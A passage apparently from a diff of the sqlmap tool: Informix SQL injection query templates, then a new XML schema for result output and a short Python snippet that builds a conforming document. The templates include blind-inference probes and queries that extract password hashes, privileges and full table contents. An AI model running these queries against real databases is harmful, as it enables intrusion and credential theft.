<limitgroupstop query="2"/>
<limitstring query=" LIMIT "/>
<order query="ORDER BY %s ASC"/>
<count query="COUNT(%s)"/>
<comment query="--"/>
<substring query="SUBSTR((%s),%d,%d)"/>
<concatenate query="%s||%s"/>
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END) FROM SYSMASTER:SYSDUAL"/>
<hex query="HEX(%s)"/>
<!-- http://www.dbforums.com/showthread.php?1660588-select-first-and-union&p=6478613#post6478613 -->
<inference query="ASCII(SUBSTR((SELECT * FROM (%s)),%d,1))>%d"/>
<banner query="SELECT DBINFO('VERSION','FULL') FROM SYSMASTER:SYSDUAL"/>
<current_user query="SELECT USER FROM SYSMASTER:SYSDUAL"/>
<current_db query="SELECT DBINFO('DBNAME') FROM SYSMASTER:SYSDUAL"/>
<hostname query="SELECT DBINFO('DBHOSTNAME') FROM SYSMASTER:SYSDUAL"/>
<table_comment/>
<column_comment/>
<is_dba query="(SELECT USERTYPE FROM SYSUSERS WHERE USERNAME=USER)='D'"/>
<users>
<inband query="SELECT USERNAME FROM SYSUSERS"/>
<blind query="SELECT SKIP %d LIMIT 1 USERNAME FROM SYSUSERS ORDER BY USERNAME" count="SELECT COUNT(USERNAME) FROM SYSUSERS"/>
</users>
<passwords>
<inband query="SELECT USERNAME,HASHED_PASSWORD||':'||SALT FROM SYSUSER:SYSINTAUTHUSERS" condition="USERNAME"/>
<blind query="SELECT HASHED_PASSWORD||':'||SALT FROM SYSUSER:SYSINTAUTHUSERS WHERE USERNAME='%s'"/>
</passwords>
<privileges>
<inband query="SELECT USERNAME,USERTYPE FROM SYSUSERS" condition="USERNAME"/>
<blind query="SELECT USERTYPE FROM SYSUSERS WHERE USERNAME='%s'"/>
</privileges>
<roles/>
<dbs>
<inband query="SELECT NAME FROM SYSMASTER:SYSDATABASES"/>
<blind query="SELECT SKIP %d LIMIT 1 NAME FROM SYSMASTER:SYSDATABASES ORDER BY NAME" count="SELECT COUNT(NAME) FROM SYSMASTER:SYSDATABASES"/>
</dbs>
<tables>
<inband query="SELECT TABNAME FROM %s:SYSTABLES WHERE TABTYPE='T' AND TABID>99"/>
<blind query="SELECT SKIP %d LIMIT 1 TABNAME FROM %s:SYSTABLES WHERE TABTYPE='T' AND TABID>99 ORDER BY TABNAME" count="SELECT COUNT(TABNAME) FROM %s:SYSTABLES WHERE TABTYPE='T' AND TABID>99"/>
</tables>
<columns>
<inband query="SELECT COLNAME,COLTYPE FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s'" condition="COLNAME"/>
<blind query="SELECT SKIP %d LIMIT 1 COLNAME FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s' ORDER BY COLNAME" query2="SELECT COLTYPE FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s' AND COLNAME='%s'" count="SELECT COUNT(COLNAME) FROM %s:SYSTABLES,%s:SYSCOLUMNS WHERE %s:SYSTABLES.TABID=%s:SYSCOLUMNS.TABID AND %s:SYSTABLES.TABNAME='%s'" condition="COLNAME"/>
</columns>
<dump_table>
<inband query="SELECT %s FROM %s:%s"/>
<blind query="SELECT SKIP %d LIMIT 1 %s FROM %s:%s ORDER BY %s" count="SELECT COUNT(*) FROM %s:%s"/>
</dump_table>
<search_db/>
<search_table/>
<search_column/>
</dbms>
</root>

xml/sqlmap.xsd (new file, 284 lines)
View File

@@ -0,0 +1,284 @@
<?xml version="1.0" encoding="utf-8"?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" elementFormDefault="qualified">
<xs:element name="Results">
<xs:complexType>
<xs:all>
<xs:element ref="Messages" minOccurs="0" />
<xs:element ref="Banner" minOccurs="0"/>
<xs:element ref="CurrentUser" minOccurs="0"/>
<xs:element ref="CurrentDB" minOccurs="0"/>
<xs:element ref="isDBA" minOccurs="0"/>
<xs:element ref="Users" minOccurs="0"/>
<xs:element ref="UserSettings" minOccurs="0"/>
<xs:element ref="DBs" minOccurs="0"/>
<xs:element ref="DBTables" minOccurs="0"/>
<xs:element ref="Technics" minOccurs="0" />
<xs:element ref="Lists" minOccurs="0" />
<xs:element ref="DatabaseColumns" minOccurs="0" />
<xs:element ref="DBValues" minOccurs="0"/>
<xs:element ref="Queries" minOccurs="0"/>
<xs:element ref="RegistryEntries" minOccurs="0"/>
<xs:element ref="FileContent" minOccurs="0"/>
<xs:element ref="Status"/>
</xs:all>
</xs:complexType>
</xs:element>
<!-- Simple Types -->
<xs:element name="Banner" type="xs:string"/>
<xs:element name="CurrentUser" type="xs:string"/>
<xs:element name="CurrentDB" type="xs:string"/>
<!-- File Content -->
<xs:element name="FileContent">
<xs:complexType mixed="true">
<xs:attribute name="name" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<!-- RegistryEntries -->
<xs:element name="RegistryEntries">
<xs:complexType>
<xs:sequence>
<xs:element ref="RegisterData" maxOccurs="unbounded"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="RegisterData" type="xs:string"/>
<!-- Queries -->
<xs:element name="Queries">
<xs:complexType>
<xs:sequence>
<xs:element ref="Query" maxOccurs="unbounded"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="Query">
<xs:complexType mixed="true">
<xs:attribute name="value" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<!-- Columns -->
<xs:element name="DatabaseColumns">
<xs:complexType>
<xs:sequence>
<xs:element ref="DB" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="DB">
<xs:complexType mixed="true">
<xs:sequence>
<xs:element ref="Table" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
<xs:attribute name="name" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<xs:element name="Table">
<xs:complexType mixed="true">
<xs:sequence>
<xs:element ref="Column" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
<xs:attribute name="name" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<xs:element name="Column">
<xs:complexType mixed="true">
<xs:attribute name="type" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<!-- List -->
<xs:element name="Member">
<xs:complexType mixed="true">
<xs:sequence>
<xs:element ref="Member" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
<xs:attribute name="type" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<xs:element name="List">
<xs:complexType mixed="true">
<xs:sequence>
<xs:element ref="Member" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
<xs:attribute name="type" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<xs:element name="Lists">
<xs:complexType>
<xs:sequence>
<xs:element ref="List" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<!-- Technics -->
<xs:element name="Technics">
<xs:complexType>
<xs:sequence>
<xs:element ref="Technic" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="Technic">
<xs:complexType mixed="true">
<xs:attribute name="type" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<!-- Messages -->
<xs:element name="Messages">
<xs:complexType>
<xs:sequence>
<xs:element ref="Message" maxOccurs="unbounded"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="Message">
<xs:complexType mixed="true">
<xs:attribute name="type" use="required" type="xs:string"/>
</xs:complexType>
</xs:element>
<!-- is DBA -->
<xs:element name="isDBA">
<xs:complexType>
<xs:attribute name="value" use="required" type="xs:NCName"/>
</xs:complexType>
</xs:element>
<!-- Users -->
<xs:element name="Users">
<xs:complexType>
<xs:sequence>
<xs:element maxOccurs="unbounded" minOccurs="0" ref="DBUser"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="DBUser" type="xs:string"/>
<!-- User Settings -->
<xs:element name="UserSettings">
<xs:complexType>
<xs:sequence>
<xs:element minOccurs="0" maxOccurs="unbounded" ref="UserSetting"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="UserSetting">
<xs:complexType>
<xs:sequence>
<xs:element minOccurs="0" maxOccurs="unbounded" ref="User"/>
</xs:sequence>
<xs:attribute name="type" use="required"/>
</xs:complexType>
</xs:element>
<xs:element name="User">
<xs:complexType>
<xs:sequence>
<xs:element ref="Settings" maxOccurs="unbounded"/>
</xs:sequence>
<xs:attribute name="type" use="required" type="xs:NCName"/>
</xs:complexType>
</xs:element>
<xs:element name="Settings">
<xs:complexType mixed="true">
<xs:attribute name="type" use="required"/>
</xs:complexType>
</xs:element>
<!-- Databases -->
<xs:element name="DBs">
<xs:complexType>
<xs:sequence>
<xs:element maxOccurs="unbounded" minOccurs="0" ref="DBName"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="DBName" type="xs:NCName"/>
<!-- DB Tables -->
<xs:element name="DBTables">
<xs:complexType>
<xs:sequence>
<xs:element maxOccurs="unbounded" minOccurs="0" ref="Database"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="Database">
<xs:complexType>
<xs:sequence>
<xs:element maxOccurs="unbounded" minOccurs="0" ref="DBTable"/>
</xs:sequence>
<xs:attribute name="name" use="required" type="xs:NCName"/>
</xs:complexType>
</xs:element>
<xs:element name="DBTable" type="xs:NCName"/>
<!-- Table Values -->
<xs:element name="DBValues">
<xs:complexType>
<xs:sequence>
<xs:element maxOccurs="unbounded" ref="DBTableValues"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="DBTableValues">
<xs:complexType>
<xs:sequence>
<xs:element ref="Row" minOccurs="0" maxOccurs="unbounded"/>
</xs:sequence>
<xs:attribute name="db" type="xs:string"/>
<xs:attribute name="name" type="xs:string"/>
</xs:complexType>
</xs:element>
<xs:element name="Row">
<xs:complexType>
<xs:sequence>
<xs:element maxOccurs="unbounded" minOccurs="0" ref="Cell"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="Cell">
<xs:complexType mixed="true">
<xs:attribute name="column" use="required" type="xs:NCName"/>
</xs:complexType>
</xs:element>
<!-- Status Elements -->
<xs:element name="Status">
<xs:complexType>
<xs:sequence>
<xs:element ref="Error" minOccurs="0"/>
</xs:sequence>
<xs:attribute name="success" use="required" type="xs:NCName"/>
</xs:complexType>
</xs:element>
<xs:element name="Error">
<xs:complexType mixed="true">
<xs:attribute name="type" use="required" type="xs:NCName"/>
</xs:complexType>
</xs:element>
</xs:schema>
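
For a quick sanity check of the schema above: Results requires only the Status element, so a minimal conforming document is tiny. The sketch below builds one with the standard library; validating it against the new .xsd (for example with lxml) is left as an assumption and is not shown.

# Illustrative sketch only -- a minimal document that should satisfy the
# xml/sqlmap.xsd schema above (Status is the only required child).
import xml.etree.ElementTree as ET

results = ET.Element("Results")
ET.SubElement(results, "Banner").text = "MySQL 5.7"
ET.SubElement(results, "Status", {"success": "true"})

print(ET.tostring(results, encoding="unicode"))
# <Results><Banner>MySQL 5.7</Banner><Status success="true" /></Results>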